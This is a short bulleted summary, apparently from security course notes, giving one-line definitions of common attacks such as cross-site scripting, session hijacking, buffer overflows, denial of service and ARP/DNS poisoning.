  • Cross-site scripting (XSS) uses web sites that accept user input without validating it:
    • It uses the server to launch attacks on the computers that access it.
  • Client-side attacks target vulnerabilities in client applications.
    • The client interacts with a compromised server.
  • Session hijacking occurs when an attacker steals a session token and impersonates the user.
  • A buffer overflow attempts to compromise a computer by pushing data into inappropriate memory locations.
  • DoS attempts to overwhelm a system so it cannot perform its normal functions.
  • In ARP and DNS poisoning, valid addresses are replaced with fraudulent addresses.
  • Access rights and privileges may also be exploited.
